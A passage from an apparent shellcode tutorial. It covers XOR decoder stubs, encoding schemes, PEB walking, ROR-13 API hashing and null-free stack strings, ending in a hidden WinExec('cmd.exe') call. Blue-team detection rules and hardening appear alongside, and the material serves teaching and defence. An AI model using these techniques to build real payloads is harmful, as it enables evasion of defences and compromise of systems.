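    for form, imm in counter_forms(n).items():
        note = "contains \\x00" if 0 in imm else "null-free"
        print(f"  {form:15} imm = {imm.hex()}  ({note})")
```

For the 8-byte payload only the CL form is null-free; for 300 bytes the CL form is wrong, the 16-bit form is clean, and the 32-bit form carries two zero bytes.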

Build and extract:

nasm -f elf32 stub.asm -o stub.o
ld   -m elf_i386 stub.o -o stub
objdump -d stub                              # eyeball the opcodes
objcopy -O binary --only-section=.text stub stub.bin
xxd -i stub.bin                              # emit a C array of the bytes

To confirm the assembled stub plus spliced payload actually executes, test it in a throwaway VM — never on your host, never networked:

/* LAB ONLY — disposable VM, no network.
   gcc -m32 -z execstack -fno-stack-protector test.c -o test */

#include <stdio.h>
unsigned char buf[] =
    "\xeb\x0d\x5e\x31\xc9\xb1\x08\x80\x36\xaa\x46\xe2\xfa\xeb\x05"
    "\xe8\xee\xff\xff\xff" /* + encoded payload bytes */;
int main(void) {
    printf("stub length: %zu\n", sizeof(buf) - 1);
    ((void(*)())buf)();
    return 0;
}

[Figure: flow diagram of the JMP-CALL-POP technique: a forward JMP reaches a CALL that pushes the payload address, POP captures it into ESI, and the decode loop XORs each byte before jumping into the now-decoded shellcode.] JMP-CALL-POP gives the decoder stub a runtime pointer to the encoded payload without any hardcoded addresses, making it fully position-independent.

6. The Stub Must Be Clean Too

This is the mistake nearly every student makes: they encode the payload until it’s spotless, splice it in, and the exploit still dies — because the decoder stub’s own opcodes contain a bad char. The transport doesn’t care which bytes are “payload” and which are “decoder.” Every byte in the buffer has to survive.

So audit the stub bytes the same way you audit everything else:

#!/usr/bin/env python3
# Flag any decoder-stub byte that collides with the bad-char set.
from capstone import Cs, CS_ARCH_X86, CS_MODE_32

def audit_stub(stub: bytes, bad: set):
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    for ins in md.disasm(stub, 0x0):
        raw = stub[ins.address:ins.address + ins.size]
        hits = [hex(b) for b in raw if b in bad]
        tag = f"   <-- BAD {hits}" if hits else ""
        print(f"{ins.address:04x}  {ins.mnemonic:6} {ins.op_str}{tag}")

When a hit shows up, rewrite the instruction to a semantically equal one with different opcodes. The textbook example: xor eax, eax assembles to \x31\xc0. If \x31 is bad, swap in sub eax, eax → \x29\xc0, which zeroes the register just as well. Same trick rescues xor ecx, ecx (\x31\xc9 → sub ecx, ecx = \x29\xc9). Keep a mental table of these substitutions; you’ll lean on it constantly.
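A dependency-free pass over the raw bytes is a useful first check before reaching for a disassembler. As a sketch, here it is applied to the 20 stub bytes from the C harness in Section 5, using the bad-char set from Section 4; bad_offsets is an illustrative name.

```python
# 20 decoder-stub bytes from the Section 5 test harness.
STUB = bytes.fromhex("eb0d5e31c9b1088036aa46e2faeb05e8eeffffff")
BAD = {0x00, 0x0a, 0x0d}          # bad-char set used in Section 4

def bad_offsets(blob: bytes, bad: set) -> list:
    """Return (offset, value) for every byte that is in the bad set."""
    return [(i, b) for i, b in enumerate(blob) if b in bad]

for offset, value in bad_offsets(STUB, BAD):
    print(f"offset {offset}: \\x{value:02x}")
```

The hit at offset 1 is the displacement of the opening jmp short: get_payload happens to sit 13 bytes ahead, which encodes as \x0d. Opcode substitution does not help with a displacement; changing the distance does, for example with a one-byte NOP inside the decoder so the displacement becomes \x0e.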

7. Per-Chunk Keyed Encoding

When the bad-char set is large enough that no single key clears the whole payload, split the work. Break the shellcode into N-byte chunks; for each chunk, search for a byte that XORs that chunk clean, then prepend the chosen key byte to the chunk. The decoder reads the key, applies it to the following N bytes, advances, and repeats.

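; Per-chunk keyed decoder. Layout: [key][d0][d1] [key][d0][d1] ... [marker]
; ESI reads the blob, EDI writes the decoded bytes back over it. Compacting
; this way removes the key bytes, which would otherwise stay interleaved
; with the decoded instructions and be executed as code.
    mov   edi, esi             ; EDI = write pointer, starts at the blob
decode_chunk:
    mov   dl, [esi]            ; DL = key for this chunk
    inc   esi                  ; ESI -> first data byte
    mov   al, [esi]
    xor   al, dl               ; decode data byte 0
    mov   [edi], al
    inc   esi
    inc   edi
    mov   al, [esi]
    xor   al, dl               ; decode data byte 1
    mov   [edi], al
    inc   esi
    inc   edi
    cmp   byte [esi], 0x90     ; end-marker (raw, unencoded NOP)?
    jne   decode_chunk
    jmp   payload_start        ; first decoded byte (start of the blob)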

Scheme	Pro	Con
Fixed single key	Smallest stub; one `xor` per byte	Fails when bad-char set is dense
Per-chunk key	Survives tight bad-char sets	Larger blob (one key byte per chunk); bigger stub

The end-marker matters here: a fixed length is brittle, so a sentinel lets the decoder run until it sees the marker instead of carrying a hardcoded count. Pick a marker value that can’t appear as a chunk key or you’ll halt early. If 0x90 is a plausible key, use a distinctive two-byte sentinel instead.
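The encoder side of this layout is short enough to sketch, together with a reference decoder for checking the round trip offline. This is an illustrative sketch under stated assumptions: two-byte chunks, a 0x90 marker, NOP padding for a short final chunk, and the benign exit(0) bytes from Section 4 as input. The function names are not from any existing tool.

```python
def encode_chunks(sc: bytes, bad: set, n: int = 2, marker: int = 0x90) -> bytes:
    """Emit [key][n data bytes]... [marker]; raise if a chunk has no clean key."""
    if marker in bad:
        raise ValueError("marker itself is a bad character")
    sc = sc + bytes([0x90]) * (-len(sc) % n)      # pad the last chunk with NOPs
    out = bytearray()
    for i in range(0, len(sc), n):
        chunk = sc[i:i + n]
        key = next((k for k in range(1, 256)
                    if k != marker and k not in bad
                    and all((b ^ k) not in bad for b in chunk)), None)
        if key is None:
            raise ValueError(f"no clean key for chunk at offset {i}")
        out.append(key)
        out.extend(b ^ key for b in chunk)
    out.append(marker)
    return bytes(out)

def decode_chunks(blob: bytes, n: int = 2, marker: int = 0x90) -> bytes:
    """Reference decoder: read key, decode n bytes, drop the key, repeat."""
    out, i = bytearray(), 0
    while blob[i] != marker:
        key = blob[i]
        out.extend(b ^ key for b in blob[i + 1:i + 1 + n])
        i += 1 + n
    return bytes(out)

shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])  # exit(0)
bad_chars = {0x00, 0x0a, 0x0d}
blob = encode_chunks(shellcode, bad_chars)
print(len(shellcode), len(blob), decode_chunks(blob) == shellcode)
```

Excluding the marker value from the key search is what keeps the decoder from halting early, at the cost of one fewer candidate key per chunk.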

8. Stack-Based Decoding

In-place decoding writes over the encoded blob where it sits. Sometimes you’d rather leave the original untouched and decode into fresh stack space — useful when the landing buffer is read-only or you want the executable copy somewhere predictable.

decoder:
    pop   esi                  ; ESI -> encoded payload
    sub   esp, 0x200           ; reserve 512 bytes of scratch
    mov   edi, esp             ; EDI -> destination buffer
    xor   edx, edx             ; offset = 0
copy_decode:
    mov   al, [esi + edx]      ; fetch encoded byte
    cmp   al, 0xcc             ; raw end-marker?
    je    run
    xor   al, 0xaa             ; decode with key
    mov   [edi + edx], al      ; write to stack
    inc   edx
    jmp   copy_decode
run:
    jmp   edi                  ; execute decoded shellcode on the stack

EDX tracks the running offset into both source and destination; the marker is checked before decoding so it stays a literal sentinel. The catches: sub esp must reserve enough room, the marker can’t collide with an encoded byte, and sub esp, 0x200 itself assembles with \x00 bytes in its immediate (81 EC 00 02 00 00), so when nulls are bad use an equivalent such as add esp, -0x204 (81 C4 FC FD FF FF). This pattern is also the one DEP/NX and Arbitrary Code Guard hit hardest: you’re executing freshly written stack memory, which is exactly what those mitigations exist to stop (Section 10).

9. shikata_ga_nai: the State of the Art

The single-byte XOR loop is trivially signatured — that tight xor / inc / loop sequence is a detection rule. Metasploit’s shikata_ga_nai answers with a polymorphic XOR additive feedback encoder. Two ideas carry it:

Chained, self-modifying key. The encoder works on 4-byte blocks, and each decoded block is folded into the key used for the next. Get one block or the initial key wrong and the rest of the payload generally decodes to noise, which also frustrates partial emulation.
Metamorphic stub generation. The decoder is rebuilt with reordered and substituted instructions every time, so two payloads from the same source rarely share a stable byte signature. Its GetPC routine is deliberately obfuscated, using FPU instructions like fnstenv [esp-0xc] to recover EIP without a tell-tale CALL, which also trips emulators that don’t model the FPU.
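The feedback idea is easier to see in a toy model. The sketch below is a simplified illustration of XOR with additive key feedback over 4-byte little-endian blocks; it is not Metasploit's implementation, the function names are made up, and it assumes the input length is a multiple of four.

```python
import struct

MASK = 0xFFFFFFFF


def feedback_encode(data: bytes, key: int) -> bytes:
    """XOR each dword with the key, then add the plaintext dword into the key."""
    out = bytearray()
    for (p,) in struct.iter_unpack("<I", data):
        out += struct.pack("<I", p ^ key)
        key = (key + p) & MASK
    return bytes(out)


def feedback_decode(blob: bytes, key: int) -> bytes:
    """Inverse of feedback_encode: each decoded dword updates the key for the next."""
    out = bytearray()
    for (c,) in struct.iter_unpack("<I", blob):
        p = c ^ key
        key = (key + p) & MASK
        out += struct.pack("<I", p)
    return bytes(out)


KEY = 0x11223344
data = b"ABCDEFGHIJKL"                        # stand-in data, 3 dwords
enc = feedback_encode(data, KEY)
print(feedback_decode(enc, KEY) == data)      # correct key round-trips
print(feedback_decode(enc, KEY ^ 2) == data)  # slightly wrong key does not
```

With the correct key the round trip is exact. With a wrong key the error usually carries forward through the key updates, although individual bit differences can occasionally cancel, so treat "the tail is noise" as the typical case rather than a guarantee.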

You don’t need to build one to defend against it. The lesson for blue teams is the opposite: stop chasing the encoded bytes and watch the behavior, because the bytes are designed to be different every time and the behavior isn’t.

10. Detection and Defense: What the Blue Team Sees

The encoded payload is, by construction, a poor signature target. The decoder’s behavior is not. Two heuristics catch nearly every variant: self-modifying memory (a region writes to itself, then executes), and execution from writable memory (RWX stack/heap pages, VirtualAlloc(PAGE_EXECUTE_READWRITE)).

Behavior	What it reveals
Tight `xor/inc/loop` over a code region	Classic fixed-key decoder stub
Region transitions writable → executable	Decoded payload about to run
Execution from unbacked memory	Code with no file on disk behind it

Sysmon Event IDs

Event ID	Name	Relevance
`1`	Process Creation	Loader/injector process spawn
`7`	Image Loaded	DLLs from temp/download paths into system processes
`8`	CreateRemoteThread	Thread created in another process — low-volume, high-signal
`10`	ProcessAccess	Cross-process memory access; inspect `GrantedAccess` and `CallTrace`
`25`	ProcessTampering	In-memory image diverges from disk (hollowing / in-memory decode)

Configuration is where visibility quietly dies. The SwiftOnSecurity sysmon-config excludes kernel32.dll as a StartModule, which silently suppresses Event ID 8 for injections that go through LoadLibraryW. Remove that StartModule exclusion to restore coverage.

Sigma Rule

title: Shellcode Injection via Suspicious Cross-Process Access
logsource:
  product: windows
  category: process_access
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high
tags:
  - attack.t1055

A CallTrace of UNKNOWN means the access originated from unbacked memory — no module owns those instructions, which is exactly the fingerprint a decoded payload leaves.
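When triaging hits, it helps to expand a GrantedAccess mask into named rights. The sketch below uses the process access-right values from the Windows SDK headers; the helper names and the choice of which bits count as "injection-capable" are assumptions made for illustration.

```python
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Rights needed for the classic allocate / write / create-thread sequence.
INJECTION_BITS = 0x0002 | 0x0008 | 0x0020


def decode_access(mask: int) -> list:
    """Return the names of the process-specific rights set in mask."""
    return [name for bit, name in PROCESS_RIGHTS.items() if mask & bit]


def allows_injection(mask: int) -> bool:
    """True when the mask grants thread creation plus remote memory write."""
    return (mask & INJECTION_BITS) == INJECTION_BITS


for value in (0x147A, 0x1410):
    print(hex(value), allows_injection(value), decode_access(value))
```

Decoded this way, 0x147a carries the full create-thread and memory-write set, while a mask such as 0x1410 is read-only access and points at memory reading rather than injection.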

ETW providers

Provider	Purpose
`Microsoft-Windows-Threat-Intelligence`	Kernel-level `VirtualAlloc`/`VirtualProtect`/`WriteProcessMemory`/`CreateRemoteThread`; consumed by PPL EDRs
`Microsoft-Windows-Security-Auditing`	Event ID `4688` process creation with command line
AMSI	Inspects script content after deobfuscation, before execution

Hardening

bcdedit /set nx AlwaysOn — system-wide DEP/NX blocks execution of decoded stack/heap output.
Arbitrary Code Guard (ACG) via ProcessDynamicCodePolicy — forbids self-modifying and dynamically generated code, which directly kills in-place XOR decode.
Code Integrity Guard (CIG) via ProcessSignaturePolicy — blocks unsigned image loads.
Watch for AmsiScanBuffer patching, the standard AMSI bypass; pair AMSI with constrained language mode and allowlisting.
Scan for RWX and unbacked regions with pe-sieve, Moneta, or Hunt-Sleeping-Beacons — the residue a decoded payload leaves behind.

Figure: behavioral indicators (RWX self-modifying memory and unbacked execution) mapped to their telemetry sources and hardening controls. Defenders shift focus from ever-changing encoded bytes to stable behavioral signals; self-modifying memory and unbacked execution are the constants that encoding cannot hide.

11. Tools

Tool	Description	Link
NASM	Assemble x86/x64 decoder stubs	nasm.us
GDB + pwndbg	Single-step the decode loop, inspect `ESI`/`ECX`	gdb.gnu.org
objdump / objcopy	Disassemble stubs, extract `.text` bytes	gnu.org
Capstone	Programmatic opcode audit for bad chars	capstone-engine.org
pwntools	Encoder/exploit automation (`pwnlib.encoders`)	docs.pwntools.com
pe-sieve / Moneta	Scan live processes for RWX / unbacked memory	github.com
Sysmon	Endpoint telemetry for Event IDs 8, 10, 25	learn.microsoft.com

12. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Obfuscated Files or Information	`T1027`	Entropy/structure anomalies; encoded blob with decoder prefix
Encrypted/Encoded File	`T1027.013`	Static scan for XOR-loop stub patterns near high-entropy data
Deobfuscate/Decode Files or Information	`T1140`	Self-modifying memory; ACG violations; ETW `VirtualProtect`
Process Injection	`T1055`	Sysmon `8`/`10`; Sigma on `GrantedAccess` + `CallTrace: UNKNOWN`
PE Injection	`T1055.002`	Shellcode written into another process; RWX region creation
Reflective Code Loading	`T1620`	Execution from unbacked memory; pe-sieve / Moneta

Summary

XOR encoding survives bad-char-hostile delivery paths because XOR is self-inverse — encode once, decode at runtime with the same key.
The decoder stub uses JMP-CALL-POP to find itself in memory, then loops xor byte [esi], key over the encoded payload and jumps in; a CL loop counter silently caps you at 255 bytes.
The stub’s own opcodes must be bad-char-clean too — audit them with Capstone and substitute equivalent instructions (sub eax,eax for xor eax,eax).
Per-chunk keys and stack-based decode handle dense bad-char sets and read-only buffers; shikata_ga_nai adds polymorphism so the encoded bytes never signature the same way twice.
Defenders ignore the shifting bytes and hunt the behavior — self-modifying RWX memory, CallTrace: UNKNOWN on Sysmon Event ID 10, and ACG/DEP violations on execution.

Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses

Objective: Understand how Windows shellcode achieves position independence — resolving module bases through the TEB/PEB chain, walking PE export tables, hashing API names, and eliminating null bytes — so defenders can detect the resulting memory and behavioral signatures and authorized red teamers can build and test payloads correctly.

1. What Makes Code Position-Dependent?

A normal Windows executable contains absolute virtual addresses everywhere: indirect calls through the Import Address Table (IAT), references to global variables, jump tables, and so on. The PE loader fixes these up at load time using the .reloc section and patches the IAT against the modules it has just mapped.

Shellcode has none of that. It is raw opcodes copied into a memory region (often allocated by VirtualAlloc or written into another process), with no loader, no relocation table, no IAT, and no guarantee about where it will live. Any hardcoded virtual address — to a string, to an API, to a jump target — will be wrong the moment the payload moves.

The constraint is therefore strict: every address the shellcode needs must be computed at runtime, from a known starting point that the OS itself hands the thread. On Windows, that starting point is the Thread Environment Block (TEB).

2. The Problem with the IAT

A standard PE binary calls LoadLibraryA via something like call qword ptr [rip+IAT_LoadLibraryA], an indirect call through a slot the loader populated. Shellcode cannot do this:

It has no .idata section, no IMAGE_IMPORT_DESCRIPTOR, and no loader to read them.
It cannot embed an absolute kernel32!LoadLibraryA address because ASLR randomizes module bases every boot.
It cannot rely on Windows syscall numbers either — those numbers are not a stable ABI and shift between builds.

The standard solution is PEB walking: the shellcode traces the in-memory loader data structures to find kernel32.dll, parses its export table, and resolves the handful of APIs it actually needs (typically LoadLibraryA and GetProcAddress, which then bootstrap anything else).

3. Windows Memory Layout Primer: TEB, PEB, and the Loader

Every Windows thread has a TEB. The OS keeps a pointer to it in a segment register so user-mode code can reach it in a single instruction:

Architecture	Instruction	Result
x86	`MOV EAX, FS:[0x30]`	`EAX` ← `TEB.ProcessEnvironmentBlock` (PEB)
x64	`MOV RAX, GS:[0x60]`	`RAX` ← `TEB.ProcessEnvironmentBlock` (PEB)

From the PEB, shellcode chains through Ldr (a _PEB_LDR_DATA*) to reach the loader’s three doubly-linked lists of _LDR_DATA_TABLE_ENTRY records — one entry per loaded module.

Relevant offsets (Windows 10/11):

Struct	Field	x86 offset	x64 offset
`_TEB`	`ProcessEnvironmentBlock`	`+0x030`	`+0x060`
`_PEB`	`Ldr`	`+0x00C`	`+0x018`
`_PEB_LDR_DATA`	`InLoadOrderModuleList`	`+0x00C`	`+0x010`
`_PEB_LDR_DATA`	`InMemoryOrderModuleList`	`+0x014`	`+0x020`
`_PEB_LDR_DATA`	`InInitializationOrderModuleList`	`+0x01C`	`+0x030`
`_LDR_DATA_TABLE_ENTRY`	`DllBase`	`+0x018`	`+0x030`
`_LDR_DATA_TABLE_ENTRY`	`BaseDllName`	`+0x02C`	`+0x058`

Verify offsets on your target build with WinDbg (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY). They are stable across mainstream Windows 10/11 but not guaranteed forever.

// Conceptual layout — fields used by PEB-walking shellcode
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY     InLoadOrderLinks;        // +0x00
    LIST_ENTRY     InMemoryOrderLinks;      // +0x10 (x64)
    LIST_ENTRY     InInitializationOrderLinks;
    PVOID          DllBase;                 // +0x30 (x64)
    PVOID          EntryPoint;
    ULONG          SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;             // +0x58 (x64)
    // ...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
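The offsets can be cross-checked without a debugger by modeling the x64 layout with fixed-width fields. This is a sketch under the assumption that the Windows 10/11 x64 layout in the table holds; the class names and explicit padding fields are illustrative, and WinDbg remains the authority for a given build.

```python
import ctypes as C


class LIST_ENTRY64(C.Structure):
    _fields_ = [("Flink", C.c_uint64), ("Blink", C.c_uint64)]


class UNICODE_STRING64(C.Structure):
    _fields_ = [("Length", C.c_uint16), ("MaximumLength", C.c_uint16),
                ("Padding", C.c_uint32),          # alignment gap before the pointer
                ("Buffer", C.c_uint64)]


class LDR_DATA_TABLE_ENTRY64(C.Structure):
    _fields_ = [
        ("InLoadOrderLinks", LIST_ENTRY64),
        ("InMemoryOrderLinks", LIST_ENTRY64),
        ("InInitializationOrderLinks", LIST_ENTRY64),
        ("DllBase", C.c_uint64),
        ("EntryPoint", C.c_uint64),
        ("SizeOfImage", C.c_uint32),
        ("Padding", C.c_uint32),                  # alignment gap before FullDllName
        ("FullDllName", UNICODE_STRING64),
        ("BaseDllName", UNICODE_STRING64),
    ]


E = LDR_DATA_TABLE_ENTRY64
print("DllBase      ", hex(E.DllBase.offset))
print("BaseDllName  ", hex(E.BaseDllName.offset))
# A Flink taken from InMemoryOrderModuleList points at InMemoryOrderLinks,
# so field offsets must be rebased by that member's own offset.
print("DllBase from InMemoryOrderLinks", hex(E.DllBase.offset - E.InMemoryOrderLinks.offset))
```

The last line is the one that matters when reading shellcode: a walk rooted in InMemoryOrderModuleList reads DllBase at +0x20 from the link pointer, not at the +0x30 shown for the start of the structure.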

Figure: the pointer chain from TEB via PEB and PEB_LDR_DATA to the kernel32.dll DllBase field. PEB-walking shellcode begins here: a single segment-register read leads through the loader chain to kernel32’s image base.

4. Walking the Module List to Find kernel32.dll

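The loader keeps InMemoryOrderModuleList in a predictable order on a normal process: the main executable first, then ntdll.dll, then kernel32.dll. (InInitializationOrderModuleList omits the executable and, since Windows 7, places kernelbase.dll ahead of kernel32.dll, so the same shortcut does not carry over to that list.) A common shortcut is to take the third entry’s DllBase without ever comparing a name: fewer bytes and no embedded strings.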

; x64 — locate kernel32.dll base via the PEB
; Output: RBX = kernel32.dll base address

    xor   rcx, rcx
    mov   rax, [gs:rcx + 0x60]      ; RAX = PEB
    mov   rax, [rax + 0x18]         ; RAX = PEB->Ldr
    mov   rax, [rax + 0x20]         ; RAX = InMemoryOrderModuleList.Flink (1st: this EXE)
    mov   rax, [rax]                ; 2nd entry: ntdll.dll
    mov   rax, [rax]                ; 3rd entry: kernel32.dll
    mov   rbx, [rax + 0x20]         ; LDR_DATA_TABLE_ENTRY.DllBase
                                    ; (offset 0x20 within an InMemoryOrder-rooted entry)

For 32-bit shellcode the same idea applies with smaller offsets:

; x86 — same walk, FS-relative
    xor   ecx, ecx
    mov   eax, [fs:ecx + 0x30]      ; EAX = PEB
    mov   eax, [eax + 0x0C]         ; PEB->Ldr
    mov   eax, [eax + 0x14]         ; InMemoryOrderModuleList.Flink
    mov   eax, [eax]                ; 2nd
    mov   eax, [eax]                ; 3rd (kernel32)
    mov   ebx, [eax + 0x10]         ; DllBase (x86 offset)

A more robust variant iterates the list and hash-compares BaseDllName.Buffer (Unicode), upper-casing each character inline. That survives reordering and is what production loaders use.

5. Parsing the PE Export Directory

Once RBX = kernel32!ImageBase, the shellcode parses the PE headers:

ImageBase
  └─► IMAGE_DOS_HEADER.e_lfanew (+0x3C)
        └─► IMAGE_NT_HEADERS
              └─► OptionalHeader.DataDirectory[0]  ; EXPORT
                    └─► IMAGE_EXPORT_DIRECTORY
                          ├─ NumberOfNames
                          ├─ AddressOfNames        (RVA → name RVAs)
                          ├─ AddressOfNameOrdinals (RVA → ordinal table)
                          └─ AddressOfFunctions    (RVA → function RVAs)

Only two of the three arrays are parallel: index i in AddressOfNames matches index i in AddressOfNameOrdinals. The 16-bit value o stored there is then used as an index into AddressOfFunctions[o]. Name and function entries are 32-bit RVAs, so the resolved function address is ImageBase + RVA.

; x64 — reach the export directory from RBX = ImageBase
; Output: RCX = IMAGE_EXPORT_DIRECTORY*
    mov   eax, dword [rbx + 0x3C]   ; DOS.e_lfanew
    lea   rdx, [rbx + rax]          ; RDX -> IMAGE_NT_HEADERS
    mov   eax, dword [rdx + 0x88]   ; NT.OptionalHeader.DataDirectory[0].VirtualAddress
    lea   rcx, [rbx + rax]          ; RCX -> IMAGE_EXPORT_DIRECTORY

    mov   r8d,  dword [rcx + 0x18]  ; NumberOfNames
    mov   r9d,  dword [rcx + 0x20]  ; AddressOfNames     (RVA)
    mov   r10d, dword [rcx + 0x24]  ; AddressOfNameOrdinals
    mov   r11d, dword [rcx + 0x1C]  ; AddressOfFunctions

The resolver then iterates 0..NumberOfNames-1, hashes the name string at ImageBase + Names[i], compares against a precomputed target, and on match returns ImageBase + Functions[ Ordinals[i] ].
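The lookup described above can be sketched with plain lists standing in for the three arrays. All names, RVAs, and the image base below are invented for illustration; a real resolver compares hashes rather than strings and reads the arrays out of the mapped image.

```python
def resolve_export(image_base, names, ordinals, functions, wanted):
    """Name index -> ordinal -> function RVA -> absolute address."""
    for i, name in enumerate(names):        # 0 .. NumberOfNames-1
        if name == wanted:
            ordinal = ordinals[i]           # same index into the ordinal table
            return image_base + functions[ordinal]
    return None


# Hypothetical export data: names are sorted, functions are in ordinal order.
image_base = 0x7FF800000000
names = ["CloseHandle", "CreateFileW", "ExitProcess"]
ordinals = [2, 0, 1]
functions = [0x1A000, 0x1B000, 0x1C000]

addr = resolve_export(image_base, names, ordinals, functions, "ExitProcess")
print(hex(addr))
```

Here "ExitProcess" sits at name index 2, whose ordinal entry is 1, so the address comes from functions[1] rather than functions[2]. Skipping the ordinal step is a classic resolver bug.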

Figure: the three export table arrays (AddressOfNames, AddressOfNameOrdinals, AddressOfFunctions) and how they combine to resolve a Windows API address at runtime. The lookup is a two-step indirection: name index maps to ordinal, ordinal maps to function RVA.

6. Function Name Hashing (ROR-13)

Embedding the literal string "LoadLibraryA" would (a) introduce hardcoded data references and (b) be a trivial AV signature. The standard substitute is an inline rolling hash. The most common is ROR-13 add:

// Conceptual ROR-13 hash. Iterate bytes of the export name; stop at NUL.
// Same routine is implemented inline in assembly when resolving APIs.
unsigned int ror13_hash(const char *name) {
    unsigned int h = 0;
    while (*name) {
        h = (h >> 13) | (h << (32 - 13));   // ROR 13
        h += (unsigned char)*name++;
    }
    return h;
}

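// Pre-computed constants for the routine above, hashing the function name only
// (illustrative; recompute for your toolchain):
// LoadLibraryA   -> 0xEC0E4E8E
// (0x0726774C, often seen for LoadLibraryA, is the Metasploit block_api value,
//  which also folds the module name into the hash)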
// GetProcAddress -> 0x7C0DFCAA
// ExitProcess    -> 0x73E2D87E
// VirtualAlloc   -> 0x91AFCA54

Replacing the while body with three cmp/ror/add instructions inside the export-walk loop produces a few dozen bytes of fully position-independent resolver — no strings, no absolute addresses, no relocations.
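For detection work it is handy to have the same hash in a scripting language, so that constants pulled out of a sample can be mapped back to API names. The sketch below reimplements the C routine above; the candidate API list is only an example.

```python
def ror13_hash(name: str) -> int:
    """ROR-13 additive hash over the ASCII bytes of an export name."""
    h = 0
    for ch in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF   # rotate right by 13 within 32 bits
        h = (h + ch) & 0xFFFFFFFF
    return h


# Build a reverse lookup table from a list of candidate export names.
candidates = ["LoadLibraryA", "GetProcAddress", "ExitProcess", "VirtualAlloc"]
lookup = {ror13_hash(n): n for n in candidates}

for value, api in lookup.items():
    print(f"0x{value:08X}  {api}")
```

Running it prints 0xEC0E4E8E for LoadLibraryA. Feeding the full export list of kernel32.dll and ntdll.dll into the same table gives a quick way to annotate hash constants found during reverse engineering or to seed YARA rules.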

7. RIP-Relative Addressing and the CALL/POP Trick

When the shellcode does need inline data (a precomputed key, a config blob, a wide-string template), it must reference it without an absolute address.

x64 makes this nearly free: every LEA reg, [rel label] and direct CALL/JMP is encoded RIP-relative:

    lea   rcx, [rel api_hash_table]   ; RIP-relative, no relocation needed

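x86 has no RIP-relative encoding. The classic substitute is the get-EIP trick: CALL the next instruction, then POP the return address into a register, giving you a known anchor. (In this simple form the CALL assembles to E8 00 00 00 00; where NUL bytes matter, the JMP-CALL-POP arrangement makes the CALL point backward so that its displacement bytes are non-zero.)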

    call  get_eip
get_eip:
    pop   ebp                          ; EBP = address of this instruction
    ; data referenced as [ebp + (label - get_eip)]

Anything stored inline can now be addressed by displacement from EBP.

8. Stack Strings and Null-Byte Elimination

Shellcode is often delivered via a string-copying primitive (strcpy, lstrcpyA, a parser that stops at \0), so embedded null bytes truncate the payload. Two problems must be solved together: avoid nulls in opcodes, and produce required strings ("kernel32.dll", "WinExec", "cmd.exe") without storing them as data.

Construct strings on the stack by pushing immediates:

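; Build "cmd.exe\0" on the stack (8 bytes including NUL)
; A plain mov rax, 0x6578652E646D63 would encode a 0x00 as the top byte of the imm64.
    mov   rax, 0x6578652E646D63FF   ; 'cmd.exe' above a 0xFF filler byte: no zero byte in the immediate
    shr   rax, 8                    ; drop the filler; the top byte becomes the NUL terminator
    push  rax                       ; stack now holds "cmd.exe\0"
    mov   rcx, rsp                  ; RCX -> "cmd.exe\0", first arg for WinExec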
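Going the other way, from pushed immediates back to text, is a routine analysis step. The sketch below assumes 64-bit pushes and NUL-terminated ASCII; the helper names are illustrative.

```python
def immediates_to_bytes(pushed):
    """pushed: 64-bit values in push order; the last push sits at the lowest address."""
    raw = b"".join(q.to_bytes(8, "little") for q in reversed(pushed))
    return raw.split(b"\x00", 1)[0]          # stop at the first NUL, like a C string


def has_nul(imm64):
    """True if the little-endian encoding of the immediate contains a zero byte."""
    return 0 in imm64.to_bytes(8, "little")


on_stack = 0x006578652E646D63                # the qword that ends up on the stack
print(immediates_to_bytes([on_stack]))
print(has_nul(on_stack), has_nul(0x6578652E646D63FF))
```

A seven-character string always leaves the top byte of its qword zero. That byte doubles as the terminator on the stack, but it is also a NUL inside the instruction if the value is loaded as a single immediate.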

Eliminate accidental nulls in opcodes:

Avoid	Use instead	Reason
`mov rax, 0` (`48 C7 C0 00 00 00 00`)	`xor rax, rax`	Removes four NUL bytes
`push 0` (`6A 00`)	`xor reg, reg; push reg`	`6A 00` contains a NUL
Short jumps spanning NUL displacements	Pad with `nop` or reorder code	Avoids NUL in the offset byte
`mov al, 0x00`	`xor al, al`	Same fix at byte width

Always disassemble and grep the assembled output for \x00 before shipping — see Section 10.

9. x64 ABI Constraints: Shadow Space and Alignment

Windows x64 imposes two rules shellcode authors get wrong constantly:

RSP must be 16-byte aligned at the point of CALL to any Windows API. The CALL itself pushes an 8-byte return address, so the callee’s RSP ends up at (16N - 8) on entry, which is what Microsoft’s prolog code expects.
The caller allocates 32 bytes of shadow space (a.k.a. home space) above the return address, even when the callee takes 0–4 arguments. The callee may spill RCX, RDX, R8, R9 into those slots.

The first four integer arguments go in RCX, RDX, R8, R9; further arguments are pushed right-to-left. Volatile registers (RAX, RCX, RDX, R8–R11) may be clobbered by any CALL; non-volatile (RBX, RBP, RDI, RSI, R12–R15) must be saved if you rely on them.

; Calling WinExec("cmd.exe", SW_HIDE) once API is resolved in RAX
    mov   rcx, rsp                  ; lpCmdLine -> "cmd.exe", assumed still at the top of the stack;
                                    ; taken before alignment, which moves RSP by 0 or 8 bytes
    and   rsp, -16                  ; force 16-byte alignment
    sub   rsp, 32                   ; shadow space (home space)

    xor   edx, edx                  ; uCmdShow = SW_HIDE (0); 32-bit write zero-extends into RDX
    call  rax                       ; WinExec

    add   rsp, 32                   ; tear down shadow space (the AND is not undone)

